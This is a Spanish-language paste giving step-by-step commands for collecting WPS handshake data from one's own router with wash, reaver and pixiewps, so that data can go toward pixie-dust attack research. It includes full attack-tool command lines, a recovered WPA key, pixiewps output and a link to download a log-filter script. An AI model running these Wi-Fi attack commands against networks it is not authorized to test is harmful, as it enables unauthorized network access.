pipels

Untitled

Jan 25th, 2018
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ¿Cómo recoger los datos pertinentes para el estudio de nuevos modos de ataques pixie dust?
  2. Para obtener los datos útiles se debe:
  3.     Pillar una respuesta PROBE de nuestro router con wash y la opción -j.
  4.     Efectuar un ataque con el PIN valido y el modo -vvv (salida máxima) de reaver
  5.     Pasar el log de reaver por un script que tenéis más abajo para extraer los datos
  6. No se asusten,  Es muy fácil y Rápido, tres lineas de ordenes.
  7.   Se debe hacer con reaver 1.6.3 o posterior
  8.  
  9. 1º terminal abierta
  10. Tengo el canal de mi access point, MAC y nombre
  11. Ahora obtenemos el probe con el siguiente comando:
  12. sudo wash -i wlan0mon -b 00:C0:CA:78:B1:37 -s -n 100 -j -c 13 | grep -i '00:C0:CA:78:B1:37'
  13. wlan0mon = a uds les puede aparecer como mon0 o wlan0
  14. 00:C0:CA:78:B1:37 = pongan su MAC correspondiente
  15. -c 13 = canal del access point (cambienlo por el correspondiente)
  16.  
  17. 2º terminal abierta
  18. Mandamos el PIN correcto, los que tienen un modem de arnet con VDSL entrando a la config via web van a ver cual es y si está habilitado/configurado. Es indispensable que sea el correcto. A continuación escribimos:
  19. sudo reaver -i wlan0mon -c 13 -b 00:C0:CA:78:B1:37 -vvv -p 84723411 | tee /tmp/reaver.log
  20. Donde:
  21. -p = numero de pin correcto
  22.  
  23. 3º terminal abierta
  24. 3Preparar los datos a mandar.
  25. Una vez la contraseña o password obtenida vamos a depurar la salida de reaver guardada en los archivos temporales.
  26. Se hace con el script logfilter.py que hemos incluido en reaver.
  27. Lo dejo aquí para que lo descarguen:
  28. https://workupload.com/FILE/myKDfdh
  29. Haganlo ejecutable en la terminal con el comando chmod +x antes de lanzarlo por si acaso.
  30. Ejecutamos el script en la terminal para obtener la salida.
  31. cat /tmp/reaver.log | python2 /ruta_donde_esta_/logfilter.py
  32. Abren un archivo de texto y copian & pegan el resultado, les va a salir algo como lo que les pongo yo ahora.
  33. POR FAVOR, ENVIENME ESE RESULTADO EN UN TXT
  34.  
  35. root@f4c3:~# cat /tmp/reaver.log | python2 logfilter.py
  36. pke = f3d3801bb8f7000174bb3f8ddcbc17ee5fe10ec5c3ad234329adb6bc7b978486a2ed20f95aa672641d51b9da7b5de8349ba33605f16cc48c543774edd3369ee4cc08e492c6ed0fe1f1c4b836bb9d03970189ff62ce2e3f381e8dfbf1859dafb51699ad51d503d8c377f2008c7e020977ef31583313da3e35b46777ff04605ffee50bffa2e3fd0686c1b7f8bd1ba5d945c7e4d28e2099664bb3620d66cced116bd85cfb7b1f46c97caee100f1e9706b6922bf19d8e742673061cbf6ad9e4e4484
  37. pkr = 984acf84c1be94de3b3c89a1673557a49f6b72c93d09bbfbf1e9dc3c8ff260f3a50cdeaaf4701ccdf3df903222ccf9ed79e00183ef1e4a52e2d564f7a9260afef7a82e1f2435862185be5373d3ce1327a52588f8dd7961c76f6fd99574f21fca5e2d882ade54ffefe0f35d437dd8d65a9bcd9f0b6ccbbefa18b9ec892d45b365171750a1bcd9a04ced46f77db0a948529487ffdbaccf527f7626f9b990eec16b4fa826fee6bbc5aef70dfb9ab0824baafd767281f58c3623136ffa0c5a4533be
  38. e_hash1 = 3fcfc03e8b40e3b4fe6054befd57f5de88302162d93d901d602b29258635f1c7
  39. e_hash2 = 6305aa117903f8a570fe356724769ebfb6f844c5b2e70203b23ee568a3bd9263
  40. authkey = 8ce4693f218bb6a98853e955fd71b35b2b24aa28c74499911221676672eb0768
  41. e_nonce = 6fe34f8be48308418d5eb898cc71f28f
  42. e_snonce1 = b2c21c840ddd3766025b5b4dcf99347a
  43. e_snonce2 = 24df6b99fc751d5b5c138d52dff58b7b
  44. wpa_psk = batmangay
  45.  
  46. running pixiewps --pke f3d3801bb8f7000174bb3f8ddcbc17ee5fe10ec5c3ad234329adb6bc7b978486a2ed20f95aa672641d51b9da7b5de8349ba33605f16cc48c543774edd3369ee4cc08e492c6ed0fe1f1c4b836bb9d03970189ff62ce2e3f381e8dfbf1859dafb51699ad51d503d8c377f2008c7e020977ef31583313da3e35b46777ff04605ffee50bffa2e3fd0686c1b7f8bd1ba5d945c7e4d28e2099664bb3620d66cced116bd85cfb7b1f46c97caee100f1e9706b6922bf19d8e742673061cbf6ad9e4e4484 --pkr 984acf84c1be94de3b3c89a1673557a49f6b72c93d09bbfbf1e9dc3c8ff260f3a50cdeaaf4701ccdf3df903222ccf9ed79e00183ef1e4a52e2d564f7a9260afef7a82e1f2435862185be5373d3ce1327a52588f8dd7961c76f6fd99574f21fca5e2d882ade54ffefe0f35d437dd8d65a9bcd9f0b6ccbbefa18b9ec892d45b365171750a1bcd9a04ced46f77db0a948529487ffdbaccf527f7626f9b990eec16b4fa826fee6bbc5aef70dfb9ab0824baafd767281f58c3623136ffa0c5a4533be --e-hash1 3fcfc03e8b40e3b4fe6054befd57f5de88302162d93d901d602b29258635f1c7 --e-hash2 6305aa117903f8a570fe356724769ebfb6f844c5b2e70203b23ee568a3bd9263 --authkey 8ce4693f218bb6a98853e955fd71b35b2b24aa28c74499911221676672eb0768 --e-nonce 6fe34f8be48308418d5eb898cc71f28f
  47.  
  48.  Pixiewps 1.4
  49.  
  50.  [-] WPS pin NOT found!
  51.  
  52.  [*] Time taken: 6 s 719 ms
Add Comment
Please, Sign In to add comment